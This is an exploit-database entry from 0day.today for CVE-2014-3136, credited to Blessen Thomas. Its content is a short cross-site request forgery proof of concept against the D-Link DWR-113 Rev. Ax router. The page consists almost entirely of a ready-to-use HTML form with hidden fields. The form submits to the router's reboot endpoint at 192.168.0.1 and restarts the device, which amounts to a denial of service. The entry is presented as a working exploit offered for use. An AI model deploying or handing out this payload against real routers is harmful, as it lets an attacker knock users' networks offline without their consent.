[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Dlink DWR-113 Rev. Ax - CSRF Denial of Service

Author
Blessen Thomas
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-22492
Category
web applications
Date add
01-08-2014
CVE
CVE-2014-3136
Platform
hardware
*Restart Router by CSRF*
 
 
 
<html>
 
  <!-- CSRF PoC --->
 
  <body>
 
    <form action="http://192.168.0.1/rebo.htm">
 
      <input type="hidden" name="S00010002" value="test" />
 
      <input type="hidden" name="np2" value="test" />
 
      <input type="hidden" name="N00150004" value="0" />
 
      <input type="hidden" name="N00150001" value="" />
 
      <input type="hidden" name="N00150003" value="1080" />
 
      <input type="hidden" name="_cce" value="0x80150002" />
 
      <input type="hidden" name="_sce" value="%Ssc" />
 
      <input type="submit" value="Submit request" />
 
    </form>
 
  </body>
 
</html>
 
 
 
 
 
Tools used :
 
Mozilla firefox browser v28.0 , Burp proxy free edition v1.5

#  0day.today [2024-12-26]  #